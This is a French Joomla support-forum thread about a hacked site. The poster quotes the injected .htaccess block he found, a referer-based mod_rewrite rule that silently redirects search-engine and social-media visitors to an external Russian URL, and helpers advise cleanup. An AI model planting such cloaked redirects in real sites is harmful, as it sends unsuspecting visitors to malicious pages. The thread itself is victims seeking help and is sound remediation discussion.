MOn site s'est fais hacker depuis ma migration vers Joomla 1.5.26!!!

Réduire
X
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • [Problème] MOn site s'est fais hacker depuis ma migration vers Joomla 1.5.26!!!

    Bonjour a tous et a toutes, je suis vraiment désespéré et mon hebergeur n'arrive pas à m'aider.
    Depuis la mise a jour de mon site joomla vers 1.5.25 au 1.5.26 (et mise a jour de tous mes plugins , composants et modules) , mon site a été piraté!

    Ce qui est bizarre c'est que mon site est accessible sans les www. mais une fois que je tape lele site est automatiquement redirigé vers google russe ou une page qui m'indique que ce site est infecté (ouvre windows anti virus?).

    De plus lorsque je tape dans google.fr mon site se fait redirigé vers un autre google?

    Je suis completement perdu , j'ai essayé de reinstaller la mise a jour, mettre a jour et supprimer tous les anciens plug in , effacer le hattaccess et mis un nouveau...

    Es ce qq 1 pourrait m'aider car je tiens bcp a mon site?

    Merci d'avance pour vos aides
    Dernière édition par juliengrano à 05/02/2013, 17h48

  • #2
    Re : MOn site s'est fais hacker depuis ma migration vers Joomla 1.5.26!!!

    Le problème c'est surement que tu n'as pas mis à jour toutes tes extensions, et il suffit d'une porte ouverte pour que quelqu'un de malveillants rentre.
    Là tu as surement eu une injection de code et une modification de ton .htaccess
    Formation Joomla agence internet https://www.stylitek.com
    Melijoy création de site Joomla compétitif https://www.melijoy.fr
    agence web spécialiste référencement http://www.agence-web-stylitek.fr

    Commentaire


    • #3
      Re : MOn site s'est fais hacker depuis ma migration vers Joomla 1.5.26!!!

      merci pour cette réponse rapide, j'ai du avoir une injection de code effectivement, j'ai bien mis a jour tous mes composents et reinstaller mon .httaccess mais rien ne marche le probleme est tjs present?

      Comment es ce que je peux resoudre ce probleme?

      Commentaire


      • #4
        Re : MOn site s'est fais hacker depuis ma migration vers Joomla 1.5.26!!!

        il faut commencer par trouver le code injecté
        Commence par regarder dans tes fichier index.html et index.php
        Tu vas surement trouver du code bizard
        Formation Joomla agence internet https://www.stylitek.com
        Melijoy création de site Joomla compétitif https://www.melijoy.fr
        agence web spécialiste référencement http://www.agence-web-stylitek.fr

        Commentaire


        • #5
          Re : MOn site s'est fais hacker depuis ma migration vers Joomla 1.5.26!!!

          Ah effectivement en ouvrant le httacess voici ce que je trouve:
          <IfModule mod_rewrite.c>
          RewriteEngine On
          RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|ex cite|altavista|msn|netscape|aol|hotbot|goto|infose ek|mamma|alltheweb|lycos|search|metacrawler|bing|d ogpile|facebook|twitter|blog|live|myspace|mail|yan dex|rambler|ya|aport|linkedin|flickr|nigma|liveint ernet|vkontakte|webalta|filesearch|yell|openstat|m etabot|nol9|zoneru|km|gigablast|entireweb|amfibi|d moz|yippy|search|walhello|webcrawler|jayde|findwha t|teoma|euroseek|wisenut|about|thunderstone|ixquic k|terra|lookle|metaeureka|searchspot|slider|topsev en|allthesites|libero|clickey|galaxy|brainysearch| pocketflier|verygoodsearch|bellnet|freenet|firebal l|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar| suchnase|schnellsuche|sharelook|sucharchiv|suchbie ne|suchmaschine|web-archiv)\.(.*)
          RewriteRule ^(.*)$ http://vause.ru/acu?11 [R=301,L]
          RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orang e|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|te lfort|hispavista|passagen|spray|eniro|telia|bluewi n|sympatico|nlsearch|atsearch|klammeraffe|shareloo k|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|d affodil|click4choice|exalead|findelio|gasta|gimpsy |globalsearchdirectory|hotfrog|jobrapido|kingdomse ek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan |qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|ex press|bestireland|browseireland|finditireland|iese arch|ireland-information|kompass|startsiden|confex|finnalle|gul esider|keyweb|finnfirma|kvasir|savio|sol|startside n|allpages|america|botw|chapu|claymont|clickz|clus h|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
          RewriteRule ^(.*)$ http://vause.ru/acu?11 [R=301,L]
          </IfModule>

          Pouvez vous me dire comment empecher le code de venir s'ecrire dans mon httaccess peut etre que si je telecharge un nouveau httaccess et que je met chmod 650?

          Commentaire


          • #6
            Re : MOn site s'est fais hacker depuis ma migration vers Joomla 1.5.26!!!

            Il faut d'abord que tu nettoies tous les fichiers infectés car je suis certain que ce n'est pas le seul.
            Pour le htaccess si tu l'avais pas modifié, oui tu reprends celui natif de joomla
            Et avant de parler de chmod il faut tout remettre d’aplomb, tu remets ton site en état et ensuite tu le protèges.
            perso pour faire tout ça c'est plus simple de le faire en local
            Formation Joomla agence internet https://www.stylitek.com
            Melijoy création de site Joomla compétitif https://www.melijoy.fr
            agence web spécialiste référencement http://www.agence-web-stylitek.fr

            Commentaire


            • #7
              Re : MOn site s'est fais hacker depuis ma migration vers Joomla 1.5.26!!!

              Merci pour la réponse je viens de remplacer mon fichier httaccess par le natif de joomla 1.5.26 en bloquant l'ecriture Chmod.
              Ma question : comment savoir quelles sont les fichiers affectés? que dois je regarder? quand vous parlez de remettre mon site d'aplomb j'ai fais une réinstallation du patch joomla 1.50 to 1.5.26 mais rien ne fonctionne?

              ou devrais je regarder?

              merci pour l'aide

              Commentaire


              • #8
                Re : MOn site s'est fais hacker depuis ma migration vers Joomla 1.5.26!!!

                là c'est un travail minutieux et de titan, il faut chercher dans tous les fichiers du site regarde déjà par date, mais en général il y en a un paquet
                Regardes déjà si ton site est bien infecté ici http://sitecheck.sucuri.net/results/

                Ensuite tu as remis le htaccess.txt mais n'était t'il pas renommer avant en .htaccess
                Formation Joomla agence internet https://www.stylitek.com
                Melijoy création de site Joomla compétitif https://www.melijoy.fr
                agence web spécialiste référencement http://www.agence-web-stylitek.fr

                Commentaire


                • #9
                  Re : MOn site s'est fais hacker depuis ma migration vers Joomla 1.5.26!!!

                  Bonjour oui j'ai changé le .httacces avec le httaccess.txt et renommé en .httaccess mais rien n'y fais meme si je change le CHMOD le hack arrive a injecter du code a mon fichier .httacess peut etre que ca vient du coté d'un module?

                  C'est vrai que ca va devenir un travail de titan!

                  Auriez vous des pistes que je devrais privilégier?

                  Commentaire


                  • #10
                    Re : MOn site s'est fais hacker depuis ma migration vers Joomla 1.5.26!!!

                    La piste je t'en ai donné une là http://forum.joomla.fr/showthread.ph...l=1#post855974
                    Formation Joomla agence internet https://www.stylitek.com
                    Melijoy création de site Joomla compétitif https://www.melijoy.fr
                    agence web spécialiste référencement http://www.agence-web-stylitek.fr

                    Commentaire


                    • #11
                      Re : MOn site s'est fais hacker depuis ma migration vers Joomla 1.5.26!!!

                      malheureusement il n'y a rien dans le index.html ou .php ;(

                      Commentaire


                      • #12
                        Re : MOn site s'est fais hacker depuis ma migration vers Joomla 1.5.26!!!

                        Non mais des index.html tu en as dans tous les dossiers. Tu as des fichiers infectés, un coup de baguette magic ne va pas t'aider à trouver où le problème se trouve. En général se sont des block de code rajouter un peu partout dans les fichiers existant.
                        Formation Joomla agence internet https://www.stylitek.com
                        Melijoy création de site Joomla compétitif https://www.melijoy.fr
                        agence web spécialiste référencement http://www.agence-web-stylitek.fr

                        Commentaire


                        • #13
                          Re : MOn site s'est fais hacker depuis ma migration vers Joomla 1.5.26!!!

                          Bonjour,

                          Je rencontre le même problème sur mon site (htaccess redirigeant vers sites russes) et je souhaiterais savoir si vous avez trouvé une solution, en particulier si d'autres fichiers que le htaccess étaient concernés.

                          Merci d'avance.

                          Commentaire


                          • #14
                            Re : MOn site s'est fais hacker depuis ma migration vers Joomla 1.5.26!!!

                            En général un grand nombre de fichiers sont concernés
                            Formation Joomla agence internet https://www.stylitek.com
                            Melijoy création de site Joomla compétitif https://www.melijoy.fr
                            agence web spécialiste référencement http://www.agence-web-stylitek.fr

                            Commentaire


                            • #15
                              Re : MOn site s'est fais hacker depuis ma migration vers Joomla 1.5.26!!!

                              Envoyé par toffffe Voir le message
                              En général un grand nombre de fichiers sont concernés
                              Bonjour et merci pour votre réponse.

                              Je m'adressais en fait à juliengrano pour savoir si il avait réussi à identifier un ou plusieurs fichiers autres que le htaccess, puisque les symptômes sont identiques pour mon site et pour le sien. Il serait intéressant de savoir comment il a procédé pour résoudre son problème (s'il l'a résolu), car pour en être victime je peux vous garantir que ce type de hack est différent du hack ordinaire où un grand nombre de fichiers index.html, php ou js sont touchés et facilement identifiables par leur date de modification. Pour ma part dans ce cas je n'ai pas réussi à découvrir d'autres fichiers infectés que le htaccess.

                              Commentaire

                              Annonce

                              Réduire
                              1 sur 2 < >

                              C'est [Réglé] et on n'en parle plus ?

                              A quoi ça sert ?
                              La mention [Réglé] permet aux visiteurs d'identifier rapidement les messages qui ont trouvé une solution.

                              Merci donc d'utiliser cette fonctionnalité afin de faciliter la navigation et la recherche d'informations de tous sur le forum.

                              Si vous deviez oublier de porter cette mention, nous nous permettrons de le faire à votre place... mais seulement une fois
                              Comment ajouter la mention [Réglé] à votre discussion ?
                              1 - Aller sur votre discussion et éditer votre premier message :


                              2 - Cliquer sur la liste déroulante Préfixe.

                              3 - Choisir le préfixe [Réglé].


                              4 - Et voilà… votre discussion est désormais identifiée comme réglée.

                              2 sur 2 < >

                              Assistance au forum - Outil de publication d'infos de votre site

                              Compatibilité: PHP 4.1,PHP4, 5, 6DEV MySQL 3.2 - 5.5 MySQLi from 4.1 ( @ >=PHP 4.4.9)

                              Support Version de Joomla! : | J!3.0 | J!2.5.xx | J!1.7.xx | J!1.6.xx | J1.5.xx | J!1.0.xx |

                              Version française (FR) D'autres versions sont disponibles depuis la version originale de FPA

                              UTILISER À VOS PROPRES RISQUES :
                              L'exactitude et l'exhaustivité de ce script ainsi que la documentation ne sont pas garanties et aucune responsabilité ne sera acceptée pour tout dommage, questions ou confusion provoquée par l'utilisation de ce script.

                              Problèmes connus :
                              FPA n'est actuellement pas compatible avec des sites Joomla qui ont eu leur fichier configuration.php déplacé en dehors du répertoire public_html.

                              Installation :

                              1. Téléchargez l'archive souhaitée : http://afuj.github.io/FPA/

                              Archive zip : https://github.com/AFUJ/FPA/zipball/master

                              2. Décompressez le fichier de package téléchargé sur votre propre ordinateur (à l'aide de WinZip ou d'un outil de décompression natif).

                              3. Lisez le fichier LISEZMOI inclus pour toutes les notes de versions spécifiques.

                              4. LIRE le fichier de documentation inclus pour obtenir des instructions d'utilisation détaillées.

                              5. Téléchargez le script fpa-fr.php à la racine de votre site Joomla!. C'est l'endroit que vous avez installé Joomla et ce n'est pas la racine principale de votre serveur. Voir les exemples ci-dessous.

                              6. Exécutez le script via votre navigateur en tapant: http:// www. votresite .com/ fpa-fr.php
                              et remplacer www. votresite .com par votre nom de domaine


                              Exemples:
                              Joomla! est installé dans votre répertoire web et vous avez installé la version française du fichier FPA:
                              Télécharger le script fpa-fr.php dans: /public_html/
                              Pour executer le script: http://www..com/fpa-fr.php

                              Joomla! est installé dans un sous-répertoire nommé "cms" et vous avez installé la version française du fichier FPA:
                              Télécharger le script fpa-fr.php dans: /public_html/cms/
                              Pour executer le script: http://www..com/cms/fpa-fr.php

                              En raison de la nature très sensible de l'information affichée par le script FPA, il doit être retiré immédiatement du serveur après son utilisation.

                              Pour supprimer le script de votre site, utilisez le lien de script de suppression fourni en haut de la page du script. Si le lien de suppression échoue pour supprimer le script, utilisez votre programme FTP pour le supprimer manuellement ou changer le nom une fois que le script a généré les données du site et le message publié sur le forum. Si le script est toujours présent sur le site, il peut être utilisé pour recueillir suffisamment d'informations pour pirater votre site. Le retrait du script empêche des étrangers de l'utiliser pour jeter un oeil à la façon dont votre site est structuré et de détecter les défauts qui peuvent être utilisé à vos dépends.
                              Voir plus
                              Voir moins
                              Travaille ...
                              X